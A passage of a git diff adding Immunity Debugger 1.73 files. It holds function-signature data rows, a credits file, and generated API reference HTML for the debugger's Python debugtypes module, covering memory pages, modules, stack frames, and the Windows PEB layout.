+?getThisType@UnDecorator@@CA?AVDName@@XZ,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH CONST\nLEA R32,DWORD PTR SS:[EBP+CONST]\nCALL CONST\nPUSH R32\nPUSH CONST",FsRirgAAAAAAAAAA,iSUqXQAAAAAAAAAA,b988feb17bd2d2496827c322958644a1d64af347,VS2005,LIBCD.LIB
+?getLastChar@charNode@@UBEDXZ,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R8,BYTE PTR DS:[R32+CONST]\nMOV ESP,EBP\nPOP EBP",EERz+wAAAAAAAAAA,[],5e0b9972deac28740ab89450f2617a1374cb1578,VS2005,LIBCD.LIB
+??H@YA?AVDName@@PBDABV0@@Z,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]",vXUgNgAAAAAAAAAA,IXdy1TF9NgCVll20lZZdtAAAAAAAAAAAMX02AAAAAAAAAAAA,ef900cac18056191ea51bda1a62c500c291db25f,VS2005,LIBCD.LIB
+?doAllocationLanguage@UnDecorator@@SAHXZ,"PUSH EBP\nMOV EBP,ESP\nMOV R32,DWORD PTR DS:[0]\nAND R32,CONST\nNEG R32\nSBB R32,R32\nINC R32\nPOP EBP",N1mO7AAAAAAAAAAA,[],e0451a5c1d9e380f31c8a2baae5278456c71326c,VS2005,LIBCD.LIB
+?getFunctionIndirectType@UnDecorator@@CA?AVDName@@ABV2@@Z,"PUSH CONST\nPUSH CONST\nPUSH CONST\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",wFln6pyGUTgAAAAAlnPwX5yGUTgAAAAAnwqMS5u9IGlGAQZORfAVhk+LzAoAAAAAnIZROE3cN3JF8BWGe/ISAGUe3VuP1JttRgEGTpu9IGkAAAAARor9BGre6mMlhIqdGLHbw5yGUTgAAAAAzdxLdUOvmGYAAAAAGLHbw1Jo6lsAAAAAJYSKnZZz8F+chlE4Tdw3cg6V6Uyr6SQSQK1wsGsQZ1qP1JttzLypBg6V6UwAAAAAUmjqWxix28OROTcfUmjqWxPCJd3MvKkGnIZROC5F5LJcdHL6j9SbbY/Um2178hIAUmjqWxix28NjuFrnXHRy+kOSIcYAAAAAm70gac3cS3VaZA4NE8Il3Q6V6UwAAAAAY7ha558KjEsAAAAAnIZROF6jgyeWc/Bfq+kkEkCtcLCcJ4w5LkXksk+LzAoAAAAAlnPwX16jgycAAAAAj9SbbUXwFYa/1ZOaXqODJ16jgycAAAAAj9SbbWUe3VtF8BWGat7qY0+LzAoAAAAADpXpTFJo6ltSaOpbQ5Ihxk+LzAoAAAAAv9WTml6jgycAAAAAWmQODUOvmGYAAAAARfAVhk+LzAoAAAAADpXpTFJo6lvhV1CJT4vMCgAAAAAAAAAAkTk3H1Jo6lsAAAAARfAVhk+LzAoAAAAAat7qY0+LzAoAAAAARor9BGsQZ1qP1JttGLHbw58KjEsAAAAA4VdQiVJo6lsAAAAAnCeMOUaK/QQAAAAAZR7dW5yGUThGiv0EXqODJ5yGUTgAAAAAnIZROJZz8F+chlE4UmjqWxix28PAWWfqXqODJ1Jo6lsAAAAAQ6+YZlJo6lsOlelMaxBnWk+LzAoAAAAAnIZROJyGUTiWc/Bf5Gb6Uo/Um21q3upj,[],1135a54638d67350e327c009734b8b7e3116407f,VS2005,LIBCD.LIB
+??0DName@@QAE@AAPBDD@Z,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH R32\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR DS:[R32+CONST]\nAND R32,CONST",J0PHrchSX9dSaOpbG1b2/Gb2nYcUGDPr7CAY4RtW9vwAAAAAUmjqW184MnrIUl/XFBgz62b2nYcnQ8etby7YV16jgycAAAAAyFJf1zUWchMAAAAAJ0PHrSdDx60nQ8etXqODJ16jgycAAAAAnwqMS16jgyfulifiJ0PHrchSX9cnQ8et7pYn4l6jgycAAAAAJ0PHrchSX9cnQ8etJ0PHrVJo6lsnQ8etNRZyE7s2BncAAAAAZvadh58KjEvDXewQXqODJ16jgycAAAAA7pYn4l6jgycAAAAAXzgyesR8C9sAAAAAJ0PHrchSX9cnQ8etXqODJ8R8C9sAAAAA7pYn4sR8C9sAAAAAw13sEG8u2FdjaCi2xHwL2wAAAAAAAAAAJ0PHrchSX9cnQ8etG1b2/O6WJ+LsIBjhuzYGd2b2nYcUGDPrY2gotl6jgycAAAAA5mC8pO6WJ+IbVvb8J0PHrSdDx60nQ8et,[],45188f6f736f48df7b21307fad3e8a2cd98bb56d,VS2005,LIBCD.LIB
+__wasctime,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],0\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR DS:[R32+CONST]\nIMUL CONST2,CONST2,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32",SKY/CQAAAAAAAAAAnIZROEimPwksaTc1Bzs2QUimPwksaTc1LGk3NQc7NkEAAAAAndPoWpyGUTgAAAAA,[],b6d436a21538efd0369cdc9aea2180705b061609,VS2005,LIBCD.LIB
diff --git a/1.73/Documentation/Cmdbox.hlp b/1.73/Documentation/Cmdbox.hlp
new file mode 100755
index 0000000..6594ee7
Binary files /dev/null and b/1.73/Documentation/Cmdbox.hlp differ
diff --git a/1.73/Documentation/Credits.txt b/1.73/Documentation/Credits.txt
new file mode 100755
index 0000000..51f96ba
--- /dev/null
+++ b/1.73/Documentation/Credits.txt
@@ -0,0 +1,10 @@
+We will like to thanks the following contributors:
+
+o Ero Carrera for pefile (http://code.google.com/p/pefile/)
+o JMS for the getrpc mod ( jms@bughunter.ca )
+o Bob for the PEid UserDB + PyCommands ( http://www.secretashell.com/BobSoft/ )
+
+
+
+
+
diff --git a/1.73/Documentation/DEBUGGER.HLP b/1.73/Documentation/DEBUGGER.HLP
new file mode 100755
index 0000000..f9f83a8
Binary files /dev/null and b/1.73/Documentation/DEBUGGER.HLP differ
diff --git a/1.73/Documentation/IMMLIB.HLP b/1.73/Documentation/IMMLIB.HLP
new file mode 100755
index 0000000..d968a55
Binary files /dev/null and b/1.73/Documentation/IMMLIB.HLP differ
diff --git a/1.73/Documentation/ImmunityDebugger.odt b/1.73/Documentation/ImmunityDebugger.odt
new file mode 100755
index 0000000..652fb93
Binary files /dev/null and b/1.73/Documentation/ImmunityDebugger.odt differ
diff --git a/1.73/Documentation/Ref/Libs.debugtypes-module.html b/1.73/Documentation/Ref/Libs.debugtypes-module.html
new file mode 100755
index 0000000..c4bc7e1
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.debugtypes-module.html
@@ -0,0 +1,259 @@
+
+
+
+
+ Libs.debugtypes
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module debugtypes
+
+
+
+
+
+
+
+
+Module debugtypes source code
+(c) Immunity, Inc. 2004-2007
+ Immunity
+ Inc.
+
+
+
+
+
+
+
+ MemoryProtection = {1: 'PAGE_NOACCESS', 2: 'PAGE_READONLY', 4:...
+
+
+
+
+
+
+ MemoryProtection
+
+
+
+
+ Value:
+
+{1: 'PAGE_NOACCESS',
+ 2: 'PAGE_READONLY',
+ 4: 'PAGE_READWRITE',
+ 8: 'PAGE_WRITECOPY',
+ 16: 'PAGE_EXECUTE',
+ 32: 'PAGE_EXECUTE_READ',
+ 64: 'PAGE_EXECUTE_READWRITE',
+ 128: 'PAGE_EXECUTE_WRITECOPY'}
+
+
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.debugtypes-pysrc.html b/1.73/Documentation/Ref/Libs.debugtypes-pysrc.html
new file mode 100755
index 0000000..674f76c
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.debugtypes-pysrc.html
@@ -0,0 +1,1264 @@
+
+
+
+
+ Libs.debugtypes
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module debugtypes
+
+
+
+
+
+
+
+
+
+ 1
+ 2
+ 3 """ 4 (c) Immunity, Inc. 2004-2007 5 6 7 U{Immunity Inc.<http://www.immunityinc.com>} 8 9 10 """ 11
+ 12 __version__ = '1.0' 13
+ 14 import debugger 15 import struct 16
+ 17
+ 18
+ 19
+ 20
+ 21
+ 22
+ 23
+ 24
+ 25
+ 26
+ 27
+ 28
+ 29
+
32 self . handle = handle
+
33 self . type = 0
+
34 self . access = 0
+
35 self . data1 = 0
+
36 self . data2 = 0
+
37 self . refcount = 0
+
38 self . htype = ""
+
39 self . username = ""
+
40 self . nativename = ""
+
41
+
43 self . type = mem [ 0 ]
+
44 self . access = mem [ 1 ]
+
45 self . data1 = mem [ 2 ]
+
46 self . data2 = mem [ 3 ]
+
47 self . refcount = mem [ 4 ]
+
48 self . htype = mem [ 5 ]
+
49 self . username = mem [ 6 ]
+
50 self . nativename = mem [ 7 ]
+
51
+
54
+
57
+
60
+
63
+
66
+
68 return self . refcount
+
69
+
72
+
74 return self . username
+
75
+
77 return self . nativename
+
78
+
81 self . address = addr
+
82 self . section = ""
+
83 self . type = ""
+
84 self . name = ""
+
85 self . comment = ""
+
86 self . module = ""
+
87
+
89 self . module = tup [ 0 ] . strip ( )
+
90 self . module = self . module . lower ( )
+
91
+
92 self . section = tup [ 1 ]
+
93 self . type = tup [ 2 ]
+
94 self . name = tup [ 3 ]
+
95 self . comment = tup [ 4 ]
+
96
+
99
+
102
+
104 return self . section
+
105
+
108
+
111
+
114
+ 115
+ 116
+ 117
+ 118
+ 119
+ 120
+ 121
+ 122
+ 123
+ 124
+ 125
+ 126
+ 127
+ 128
+ 129
+ 130
+ 131
+ 132
+ 133
+ 134
+ 135
+ 136
+ 137
+ 138
+ 139
+ 140
+ 141
+ 142
+ 143
+ 144
+ 145
+ 146
+ 147
+
149 - def __init__ ( self , name , baseaddress , size , entrypoint ) :
+
150 """
+
151 Module Information
+
152
+
153 @type name: STRING
+
154 @param name: Name of the module
+
155
+
156 @type baseaddress: DWORD
+
157 @param baseaddress: Base Address of the Module
+
158
+
159 @type size: DWORD
+
160 @param size: Size of the Module
+
161
+
162 @type entrypoint: DWORD
+
163 @param entrypoint: Entry Point
+
164 """
+
165
+
166
+
167
+
168
+
169
+
170
+
171
+
172 self . name = name . lower ( )
+
173 self . baseaddress = baseaddress
+
174 self . size = size
+
175 self . entrypoint = entrypoint
+
176 self . modDict = None
+
177 self . symbols = [ ]
+
178 self . XREFto = { }
+
179 self . XREFfrom = { }
+
180
+
182 """
+
183 Get the all the functions from Module
+
184
+
185 @rtype: LIST of DWORD
+
186 @return: A List of the address of all function
+
187 """
+
188 return debugger . Getallfunctions ( self . baseaddress )
+
189
+
190 - def _xrefs ( self , address , XREF , debugger_callback ) :
+
191 code = self . getCodebase ( )
+
192 codesize = self . getCodesize ( )
+
193
+
194
+
195 if address >= code and address <= ( code + codesize ) :
+
196 return [ ]
+
197
+
198
+
199 if not XREF :
+
200 XREF = debugger_callback ( address )
+
201
+
202
+
203 try :
+
204 return XREF [ address ]
+
205 except KeyError :
+
206 return [ ]
+
207
+
209 """
+
210 Get the Xreference to the given address
+
211
+
212 @type address: DWORD
+
213 @param address: Address in the Module to get Xref to
+
214
+
215 @rtype: LIST of DWORD
+
216 @return: List of Address
+
217 """
+
218 return self . _xrefs ( address , self . XREFto , debugger . Getxref_to )
+
219
+
221 """
+
222 Get the Xreference from the given address
+
223
+
224 @type address: DWORD
+
225 @param address: Address in the Module to get Xref from
+
226
+
227 @rtype: LIST of DWORD
+
228 @return: List of Address
+
229 """
+
230 return self . _xrefs ( address , self . XREFfrom , debugger . Getxref_from )
+
231
+
233 """
+
234 Get the Base Address
+
235
+
236 @rtype: DWORD
+
237 @return: Base Address
+
238 """
+
239 return self . baseaddress
+
240
+
242 return debugger . Getreferencedstrings ( self . entrypoint )
+
243
+
245 self . modDict = mod_dict
+
246
+
248 self . symbols = symbol
+
249
+
251 """
+
252 Analize the Current Module
+
253 """
+
254 return debugger . Analysecode ( self . baseaddress )
+
255
+
256 - def get ( self , name ) :
+
257 name = name . lower ( )
+
258 if not self . modDict . has_key ( name ) :
+
259 return None
+
260 return self . modDict [ name ] [ 0 ]
+
261
+
263 return self . symbols
+
264
+
266 """
+
267 Get Base from module
+
268
+
269 @rtype: DWORD
+
270 @return: Base from the module
+
271 """
+
272 try :
+
273 return self . modDict [ 'base' ] [ 0 ]
+
274 except KeyError :
+
275 return None
+
276
+
278 """
+
279 Get Size from module
+
280 """
+
281 try :
+
282 return self . modDict [ 'size' ] [ 0 ]
+
283 except KeyError :
+
284 return None
+
285
+
287 """
+
288 Get Type from module
+
289 """
+
290 try :
+
291 return self . modDict [ 'type' ] [ 0 ]
+
292 except KeyError :
+
293 return None
+
294
+
296 """
+
297 Get Codebase from module
+
298 """
+
299 try :
+
300 return self . modDict [ 'codebase' ] [ 0 ]
+
301 except KeyError :
+
302 return None
+
303
+
305 """
+
306 Get Codesize from module
+
307
+
308 @rtype: DWORD
+
309 @return: Code Size
+
310 """
+
311 try :
+
312 return self . modDict [ 'codesize' ] [ 0 ]
+
313 except KeyError :
+
314 return None
+
315
+
317 """
+
318 Get Resbase from module
+
319
+
320 @rtype: DWORD
+
321 @return: Res Base
+
322
+
323 """
+
324 try :
+
325 return self . modDict [ 'resbase' ] [ 0 ]
+
326 except KeyError :
+
327 return None
+
328
+
330 """
+
331 Get Ressize from module
+
332
+
333 @rtype: DWORD
+
334 @return: Res Size
+
335 """
+
336 try :
+
337 return self . modDict [ 'ressize' ] [ 0 ]
+
338 except KeyError :
+
339 return None
+
340
+
341 - def getEntry ( self ) :
+
342 """
+
343 Get Entry from module
+
344
+
345 @rtype: DWORD
+
346 @return: Entry
+
347 """
+
348 try :
+
349 return self . modDict [ 'entry' ] [ 0 ]
+
350 except KeyError :
+
351 return None
+
352
+
354 """
+
355 Get Database from module
+
356
+
357 @rtype: DWORD
+
358 @return: Database
+
359 """
+
360 try :
+
361 return self . modDict [ 'database' ] [ 0 ]
+
362 except KeyError :
+
363 return None
+
364
+
366 """
+
367 Get Idatatable from module
+
368 """
+
369 try :
+
370 return self . modDict [ 'idatatable' ] [ 0 ]
+
371 except KeyError :
+
372 return None
+
373
+
375 """Get Idatabase from module"""
+
376 try :
+
377 return self . modDict [ 'idatabase' ] [ 0 ]
+
378 except KeyError :
+
379 return None
+
380
+
382 """
+
383 Get Edatatable from module
+
384 """
+
385 try :
+
386 return self . modDict [ 'edatatable' ] [ 0 ]
+
387 except KeyError :
+
388 return None
+
389
+
391 """
+
392 Get Edatasize from module
+
393 """
+
394 try :
+
395 return self . modDict [ 'edatasize' ] [ 0 ]
+
396 except KeyError :
+
397 return None
+
398
+
400 """
+
401 Get Reloctable from module
+
402 """
+
403 try :
+
404 return self . modDict [ 'reloctable' ] [ 0 ]
+
405 except KeyError :
+
406 return None
+
407
+
409 """
+
410 Get Relocsize from module
+
411 """
+
412 try :
+
413 return self . modDict [ 'relocsize' ] [ 0 ]
+
414 except KeyError :
+
415 return None
+
416
+
418 """
+
419 Get Name from module
+
420 """
+
421 try :
+
422 return self . name
+
423 except KeyError :
+
424 return None
+
425
+
427 """
+
428 Get Path from module
+
429 """
+
430 try :
+
431 return self . modDict [ 'path' ] [ 0 ]
+
432 except KeyError :
+
433 return None
+
434
+
436 """
+
437 Get Nsect from module
+
438 """
+
439 try :
+
440 return self . modDict [ 'nsect' ] [ 0 ]
+
441 except KeyError :
+
442 return None
+
443
+
445 """
+
446 Get Headersize from module
+
447 """
+
448 try :
+
449 return self . modDict [ 'headersize' ] [ 0 ]
+
450 except KeyError :
+
451 return None
+
452
+
454 """
+
455 Get Fixupbase from module
+
456 """
+
457 try :
+
458 return self . modDict [ 'fixupbase' ] [ 0 ]
+
459 except KeyError :
+
460 return None
+
461
+
463 """
+
464 Get Codedec from module
+
465 """
+
466 try :
+
467 return self . modDict [ 'codedec' ] [ 0 ]
+
468 except KeyError :
+
469 return None
+
470
+
472 """
+
473 Get Codecrc from module
+
474 """
+
475 try :
+
476 return self . modDict [ 'codecrc' ] [ 0 ]
+
477 except KeyError :
+
478 return None
+
479
+
481 """
+
482 Get Hittrace from module
+
483 """
+
484 try :
+
485 return self . modDict [ 'hittrace' ] [ 0 ]
+
486 except KeyError :
+
487 return None
+
488
+
490 """
+
491 Get Datadec from module
+
492 """
+
493 try :
+
494 return self . modDict [ 'datadec' ] [ 0 ]
+
495 except KeyError :
+
496 return None
+
497
+
499 """
+
500 Get Globaltypes from module
+
501 """
+
502 try :
+
503 return self . modDict [ 'globaltypes' ] [ 0 ]
+
504 except KeyError :
+
505 return None
+
506
+
507 - def getMainentry ( self ) :
+
508 """
+
509 Get Mainentry from module
+
510 """
+
511 try :
+
512 return self . modDict [ 'mainentry' ] [ 0 ]
+
513 except KeyError :
+
514 return None
+
515
+
516 - def getRealsfxentry ( self ) :
+
517 """
+
518 Get Realsfxentry from module
+
519 """
+
520 try :
+
521 return self . modDict [ 'realsfxentry' ] [ 0 ]
+
522 except KeyError :
+
523 return None
+
524
+
526 """
+
527 Get Origcodesize from module
+
528 """
+
529 try :
+
530 return self . modDict [ 'origcodesize' ] [ 0 ]
+
531 except KeyError :
+
532 return None
+
533
+
535 """
+
536 Get Sfxbase from module
+
537 """
+
538 try :
+
539 return self . modDict [ 'sfxbase' ] [ 0 ]
+
540 except KeyError :
+
541 return None
+
542
+
544 """
+
545 Get Sfxsize from module
+
546 """
+
547 try :
+
548 return self . modDict [ 'sfxsize' ] [ 0 ]
+
549 except KeyError :
+
550 return None
+
551
+
553 """
+
554 Get Issystemdll from module
+
555 """
+
556 try :
+
557 return self . modDict [ 'issystemdll' ] [ 0 ]
+
558 except KeyError :
+
559 return None
+
560
+
562 """
+
563 Get Version from module
+
564 """
+
565 try :
+
566 return self . modDict [ 'version' ] [ 0 ]
+
567 except KeyError :
+
568 return None
+
569
+
571 """
+
572 Check if module was analysed
+
573 """
+
574
+
575 return debugger . IsAnalysed ( self . baseaddress )
+
576
+
578 """
+
579 get jump list from analysed module
+
580 """
+
581
+
582
+
583
+
584
+
585
+
586
+
587
+
588
+
589
+
590
+
591
+
592
+
593
+
594
+
595 try :
+
596 return self . modDict [ 'jumplist' ] [ 0 ]
+
597 except KeyError :
+
598 return None
+
599
+ 600
+
603 self . address = 0
+
604 self . stack = 0
+
605 self . procedure = ""
+
606 self . calledfrom = 0
+
607 self . frame = 0
+
608
+
609 self . stackdump1 = 0
+
610 self . stackdump2 = 0
+
611 self . stackdump3 = 0
+
612
+
614 self . address = s [ 0 ]
+
615 self . stack = s [ 1 ]
+
616 self . procedure = str ( s [ 2 ] )
+
617 self . calledfrom = s [ 3 ]
+
618 self . frame = s [ 4 ]
+
619 self . stackdump1 = s [ 5 ]
+
620 self . stackdump2 = s [ 6 ]
+
621 self . stackdump3 = s [ 7 ]
+
622
+
623
+
625 return ( self . stackdump1 , self . stackdump2 , self . stackdump3 )
+
626
+
628 return self . address
+
629
+
632
+
634 return self . procedure
+
635
+
638
+
640 return self . calledfrom
+
641
+ 642
+
644 - def __init__ ( self , imm , title , col_titles ) :
+
645 """
+
646 Create a GUI Window Table
+
647
+
648 @type imm: Debugger Object
+
649 @param imm: Debugger
+
650
+
651 @type title: STRING
+
652 @param title: Title for the Window
+
653
+
654 @type col_titles: LIST of STRINGs
+
655 @param col_titles: List of the Column's Name
+
656 """
+
657 self . imm = imm
+
658 self . instance = self . createTable ( title , col_titles )
+
659
+
661 title1 = ""
+
662 title2 = ""
+
663 title3 = ""
+
664 title4 = ""
+
665 title5 = ""
+
666 if len ( col_titles ) > 5 :
+
667 maxcol = 5
+
668 else :
+
669 maxcol = len ( col_titles )
+
670 try :
+
671 title1 = col_titles [ 0 ]
+
672 except :
+
673 pass
+
674 try :
+
675 title2 = col_titles [ 1 ]
+
676 except :
+
677 pass
+
678 try :
+
679 title3 = col_titles [ 2 ]
+
680 except :
+
681 pass
+
682 try :
+
683 title4 = col_titles [ 3 ]
+
684 except :
+
685 pass
+
686 try :
+
687 title5 = col_titles [ 4 ]
+
688 except :
+
689 pass
+
690 return debugger . Createtable ( title , maxcol , title1 , title2 , title3 , title4 , title5 )
+
691
+
692
+
693 - def Log ( self , data , address = 0 , focus = False ) :
+
694 """
+
695 Add a message into a column
+
696
+
697 @type data: STRING
+
698 @param data: Message for the column
+
699
+
700 @type address: DWORD
+
701 @param address: (Optional, Default: 0) Address related to the message
+
702
+
703 @type focus: BOOLEAN
+
704 @param focus: (Optional, Default: False) Whether or not give focus to the window
+
705 """
+
706 return debugger . Addtotable ( self . instance , address , "0x%08x" % address , data , "" , "" , "" )
+
707
+
708
+
710 return debugger . IsValidHandle ( self . instance )
+
711
+
712
+
713 - def add ( self , address , data ) :
+
714 """
+
715 Add Data to the Window
+
716
+
717 @type address: DWORD
+
718 @param address: Address related to the Data
+
719
+
720 @type data: LIST OF STRING
+
721 @param data: Data to add on the different columns
+
722 """
+
723 col1 = ""
+
724 col2 = ""
+
725 col3 = ""
+
726 col4 = ""
+
727 col5 = ""
+
728 if not address :
+
729 address = 0x0
+
730 try :
+
731 col1 = data [ 0 ]
+
732 except :
+
733 pass
+
734 try :
+
735 col2 = data [ 1 ]
+
736 except :
+
737 pass
+
738 try :
+
739 col3 = data [ 2 ]
+
740 except :
+
741 pass
+
742 try :
+
743 col4 = data [ 3 ]
+
744 except :
+
745 pass
+
746 try :
+
747 col5 = data [ 4 ]
+
748 except :
+
749 pass
+
750 return debugger . Addtotable ( self . instance , address , col1 , col2 , col3 , col4 , col5 )
+
751
+ 752
+ 753 MemoryProtection = { 0x10 : "PAGE_EXECUTE" , 0x20 : "PAGE_EXECUTE_READ" , 0x40 : "PAGE_EXECUTE_READWRITE" , \ 754 0x80 : "PAGE_EXECUTE_WRITECOPY" , 0x01 : "PAGE_NOACCESS" , 0x02 : "PAGE_READONLY" , \
+ 755 0x04 : "PAGE_READWRITE" , 0x08 : "PAGE_WRITECOPY" }
+ 756
+
758 - def __init__ ( self , baseaddress , imm ) :
+
759 """
+
760 Memory Page Information
+
761
+
762 @type baseaddress: DWORD
+
763 @param baseaddress: Base Address of the Memory Page
+
764
+
765 @type imm: Debugger OBJECT
+
766 @param imm: Debugger
+
767 """
+
768 self . baseaddress = baseaddress
+
769 self . imm = imm
+
770 self . size = 0
+
771 self . type = 0
+
772 self . owner = 0
+
773 self . initaccess = 0
+
774 self . access = 0
+
775 self . threadid = 0
+
776 self . section = ""
+
777 self . mem = ""
+
778
+
779 - def _getfromtuple ( self , mem ) :
+
780 requery = debugger . VmQuery ( self . baseaddress )
+
781 self . size = mem [ 0 ]
+
782 self . type = mem [ 1 ]
+
783 self . owner = mem [ 2 ]
+
784 self . initaccess = requery [ 4 ]
+
785 self . access = requery [ 3 ]
+
786 self . threadid = mem [ 5 ]
+
787 self . section = mem [ 6 ]
+
788
+
789 - def getBaseAddress ( self ) :
+
790 return self . baseaddress
+
791
+
792 - def getSize ( self ) :
+
794
+
795 - def getType ( self ) :
+
796 """
+
797 Get Type of Memory Page
+
798
+
799 @rtype: DWORD
+
800 @return: Type of Page
+
801 """
+
802 return self . type
+
803
+
804 - def getOwner ( self ) :
+
805 """
+
806 Get the Owner of the Memory Page
+
807
+
808 @rtype: STRING
+
809 @return: Owner of the Page
+
810 """
+
811
+
812 mod = self . imm . findModule ( self . owner )
+
813 if not mod :
+
814 return "0x%08x" % self . owner
+
815 else :
+
816 return mod [ 0 ]
+
817
+
818 - def _getflags ( self , page ) :
+
819 try :
+
820 return PageFlags [ page ]
+
821 except KeyError :
+
822 return " "
+
823
+
824 - def getInitAccess ( self , human = 0 ) :
+
825 """
+
826 Get the Intial Access Flag of the Memory Page
+
827
+
828 @type human: Human Readable String Flag
+
829 @param human: Boolean
+
830
+
831 @rtype: DWORD
+
832 @return: Initial Access Flag
+
833
+
834
+
835 """
+
836 if human == 0 :
+
837 return self . initaccess
+
838 else :
+
839 return MemoryProtection [ self . initaccess & 0xFF ]
+
840
+
841 - def getAccess ( self , human = 0 ) :
+
842 """
+
843 Get the Access Flag of the Memory Page
+
844
+
845 @type human: Human Readable String Flag
+
846 @param human: Boolean
+
847
+
848 @rtype: DWORD
+
849 @return: Access Flag
+
850 """
+
851 if human == 0 :
+
852 return self . access
+
853 else :
+
854 return MemoryProtection [ self . access & 0xFF ]
+
855
+
856
+
857
+
858 - def getThreadID ( self ) :
+
859 """
+
860 Get the ID of the Thread
+
861
+
862 @rtype: DWORD
+
863 @return: Thread ID
+
864 """
+
865 return self . threadid
+
866
+
867 - def getMemory ( self ) :
+
868 """
+
869 Get the Memory of the Page
+
870
+
871 @rtype: BUFFER
+
872 @return: Page Memory
+
873 """
+
874 if not self . mem :
+
875 self . mem = self . imm . readMemory ( self . baseaddress , self . size )
+
876 return self . mem
+
877
+
878 - def getBaseAddress ( self ) :
+
879 """
+
880 Get the Base Address of the Memory Page
+
881
+
882 @rtype: DWORD
+
883 @return: Base Address
+
884 """
+
885 return self . baseaddress
+
886
+
887 - def getSection ( self ) :
+
888 """
+
889 Get the Section from the Memory Page
+
890
+
891 @rtype: STRING
+
892 @return: Section
+
893 """
+
894 return self . section
+
895
+
896 - def search ( self , buf ) :
+
897 """
+
898 Search string in this memory page.
+
899
+
900 @param buf: Buffer to search for
+
901 @return: A list of address where the string was found on this memory page
+
902 """
+
903
+
904 self . getMemory ( )
+
905 if not self . mem :
+
906 return [ ]
+
907 ndx = 0
+
908 find = [ ]
+
909 buf_size = len ( buf )
+
910 while 1 :
+
911 f = self . mem [ ndx : ] . find ( buf )
+
912 if f == - 1 : break
+
913 find . append ( ndx + f + self . baseaddress )
+
914 ndx += f + buf_size
+
915 return find
+
916
+ 917
+ 918
+ 919
+
922 """
+
923 Process Environment Block
+
924
+
925 @type imm: Debugger OBJECT
+
926 @param imm: Debugger
+
927 """
+
928
+
929
+
930 self . base = imm . getPEBaddress ( )
+
931
+
932 try :
+
933 self . PEB = imm . readMemory ( self . base , 488 )
+
934 except :
+
935 error = "can't read PEB struct"
+
936 raise Exception , error
+
937
+
938 """
+
939 0:000> !kdex2x86.strct PEB
+
940 Loaded kdex2x86 extension DLL
+
941 struct _PEB (sizeof=488)
+
942 +000 byte InheritedAddressSpace
+
943 +001 byte ReadImageFileExecOptions
+
944 +002 byte BeingDebugged
+
945 +003 byte SpareBool
+
946 +004 void *Mutant
+
947 +008 void *ImageBaseAddress
+
948 +00c struct _PEB_LDR_DATA *Ldr
+
949 +010 struct _RTL_USER_PROCESS_PARAMETERS *ProcessParameters
+
950 +014 void *SubSystemData
+
951 +018 void *ProcessHeap
+
952 +01c void *FastPebLock
+
953 +020 void *FastPebLockRoutine
+
954 +024 void *FastPebUnlockRoutine
+
955 +028 uint32 EnvironmentUpdateCount
+
956 +02c void *KernelCallbackTable
+
957 +030 uint32 SystemReserved[2]
+
958 +038 struct _PEB_FREE_BLOCK *FreeList
+
959 +03c uint32 TlsExpansionCounter
+
960 +040 void *TlsBitmap
+
961 +044 uint32 TlsBitmapBits[2]
+
962 +04c void *ReadOnlySharedMemoryBase
+
963 +050 void *ReadOnlySharedMemoryHeap
+
964 +054 void **ReadOnlyStaticServerData
+
965 +058 void *AnsiCodePageData
+
966 +05c void *OemCodePageData
+
967 +060 void *UnicodeCaseTableData
+
968 +064 uint32 NumberOfProcessors
+
969 +068 uint32 NtGlobalFlag
+
970 +070 union _LARGE_INTEGER CriticalSectionTimeout
+
971 +070 uint32 LowPart
+
972 +074 int32 HighPart
+
973 +070 struct __unnamed3 u
+
974 +070 uint32 LowPart
+
975 +074 int32 HighPart
+
976 +070 int64 QuadPart
+
977 +078 uint32 HeapSegmentReserve
+
978 +07c uint32 HeapSegmentCommit
+
979 +080 uint32 HeapDeCommitTotalFreeThreshold
+
980 +084 uint32 HeapDeCommitFreeBlockThreshold
+
981 +088 uint32 NumberOfHeaps
+
982 +08c uint32 MaximumNumberOfHeaps
+
983 +090 void **ProcessHeaps
+
984 +094 void *GdiSharedHandleTable
+
985 +098 void *ProcessStarterHelper
+
986 +09c uint32 GdiDCAttributeList
+
987 +0a0 void *LoaderLock
+
988 +0a4 uint32 OSMajorVersion
+
989 +0a8 uint32 OSMinorVersion
+
990 +0ac uint16 OSBuildNumber
+
991 +0ae uint16 OSCSDVersion
+
992 +0b0 uint32 OSPlatformId
+
993 +0b4 uint32 ImageSubsystem
+
994 +0b8 uint32 ImageSubsystemMajorVersion
+
995 +0bc uint32 ImageSubsystemMinorVersion
+
996 +0c0 uint32 ImageProcessAffinityMask
+
997 +0c4 uint32 GdiHandleBuffer[34]
+
998 +14c function *PostProcessInitRoutine
+
999 +150 void *TlsExpansionBitmap
+
1000 +154 uint32 TlsExpansionBitmapBits[32]
+
1001 +1d4 uint32 SessionId
+
1002 +1d8 void *AppCompatInfo
+
1003 +1dc struct _UNICODE_STRING CSDVersion
+
1004 +1dc uint16 Length
+
1005 +1de uint16 MaximumLength
+
1006 +1e0 uint16 *Buffer
+
1007 """
+
1008
+
1009 index = 0x000
+
